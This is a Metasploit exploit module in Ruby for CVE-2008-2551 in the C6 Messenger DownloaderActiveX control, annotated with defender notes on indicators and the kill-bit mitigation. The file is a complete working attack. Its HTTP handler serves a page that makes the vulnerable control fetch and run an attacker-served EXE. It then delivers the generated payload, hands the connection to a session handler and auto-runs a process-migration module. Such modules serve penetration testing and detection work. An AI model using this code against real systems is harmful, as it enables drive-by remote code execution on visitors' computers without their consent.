Path: blob/master/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser-delivered module for CVE-2008-2551 (Icona SpA C6 Messenger 1.0.0.1).
#
# The module acts as an HTTP server with two roles on the same resource:
#   * for an ordinary page request it returns HTML that instantiates the
#     DownloaderActiveX control with a download URL and a post-download
#     action of "run";
#   * for a request whose URI contains the per-run token @payload_rand it
#     returns the generated EXE.
#
# Defender notes, from what this file shows:
#   * The stable artefacts are the control's CLSID and the prop* parameter
#     names in the served page. The URL path token and the EXE file name are
#     random, so URL-string signatures will not hold across runs.
#   * The follow-up download is made by the control rather than the browser:
#     the handler expects a User-Agent containing "File Session" and answers
#     with Content-Type application/octet-stream.
#   * The root cause is client-side: a control that fetches and runs a URL
#     supplied by the page. Removing the control, or setting the Internet
#     Explorer kill bit for its CLSID, stops a page from instantiating it.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] caller-supplied metadata, passed to update_info
  #   together with the values declared below
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',
        'Description' => %q{
          This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The
          vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The
          insecure control can be abused to download and execute arbitrary files in the context of
          the currently logged-on user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Nine:Situations:Group::SnoopyAssault, vulnerability discovery and exploit
          'juan vazquez' # metasploit module
        ],
        # Public identifiers for the flaw; use these to look up vendor and
        # scanner coverage.
        'References' => [
          [ 'CVE', '2008-2551' ],
          [ 'OSVDB', '45960' ],
          [ 'BID', '29519' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => "none",
          # Names a post module to run when a session opens.
          # NOTE(review): presumably moves the session out of the browser
          # process; confirm against that module, it is not shown here.
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
        'Payload' => {
          'Space' => 2048,
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Automatic', {} ],
        ],
        'DisclosureDate' => '2008-06-03',
        'DefaultTarget' => 0,
        # Matches the description: code runs as the logged-on user.
        'Privileged' => false,
        # Reliability, stability and side effects are all declared with the
        # framework's UNKNOWN_* constants.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Always returns false.
  # NOTE(review): presumably opts the module out of automated module
  # selection; the caller of this hook is not visible in this file.
  def autofilter
    false
  end

  # Delegates to use_zlib, which is defined outside this file.
  # NOTE(review): presumably verifies or enables zlib support; confirm
  # against the HttpServer mixin.
  def check_dependencies
    use_zlib
  end

  # Handles one HTTP request to the module's resource.
  #
  # Flow, in order:
  #   1. Reject any User-Agent that matches neither pattern below.
  #   2. Build the absolute URL under which the EXE is offered.
  #   3. If the request URI contains the per-run token, send the EXE.
  #   4. Otherwise send the HTML page that instantiates the control.
  #
  # @param cli the client connection; cli.peerhost is read to choose a
  #   source address when SRVHOST is the wildcard address
  # @param request the HTTP request; its headers and uri are read
  def on_request_uri(cli, request)
    # Only IEs are potential targets
    # "File Session" is used when the ActiveX tries to request the EXE
    agent = request.headers['User-Agent']
    if agent !~ /MSIE \d\.\d|File Session/
      # Nothing is sent to the client on this path; the agent is only logged.
      print_error("Target not supported: #{agent}")
      return
    end

    # A wildcard SRVHOST cannot appear in a URL handed to the client, so the
    # address is derived from the client's peer address instead.
    payload_url = "http://"
    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/#{@payload_rand}"

    # Second stage: the token is matched as an unanchored pattern, so it may
    # sit anywhere in the URI. On the wire this is a request with a
    # "File Session" User-Agent answered by an application/octet-stream body.
    if (request.uri.match(/#{@payload_rand}/))
      return if ((p = regenerate_payload(cli)) == nil)

      data = generate_payload_exe({ :code => p.encoded })
      print_status("Sending EXE payload")
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    # Random file name regenerated on every page request; it carries no
    # detection value.
    exe = rand_text_alpha(rand(5) + 1)

    # First stage: the page served to the browser. The fixed strings here are
    # the durable indicators for content inspection: the CLSID, the
    # DownloaderActiveX.cab codebase, propDownloadUrl ending in .exe and
    # propPostDownloadAction set to "run". The CLSID is also the value a
    # kill-bit mitigation is keyed on.
    content = %Q|
<html>
<object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1">
<param name="propProgressBackground" value="#bccee8">
<param name="propTextBackground" value="#f7f8fc">
<param name="propBarColor" value="#df0203">
<param name="propTextColor" value="#000000">
<param name="propWidth" value="0">
<param name="propHeight" value="0">
<param name="propDownloadUrl" value="#{payload_url}/#{exe}.exe">
<param name="propPostDownloadAction" value="run">
<param name="propInstallCompleteUrl" value="">
<param name="propBrowserRedirectUrl" value="">
<param name="propVerbose" value="0">
<param name="propInterrupt" value="0">
</OBJECT>
</html>
|

    print_status("Sending #{self.name}")

    send_response_html(cli, content)

    # Hands the client connection to the framework's payload handler.
    handler(cli)
  end

  # Chooses the per-run URL token, then defers to the framework's exploit
  # implementation. The token is what on_request_uri looks for to tell the
  # EXE request apart from the page request.
  # NOTE(review): rand(5) + 5 is passed as the length, so presumably 5 to 9
  # alphabetic characters; rand_text_alpha is defined outside this file.
  def exploit
    @payload_rand = rand_text_alpha(rand(5) + 5)
    super
  end
end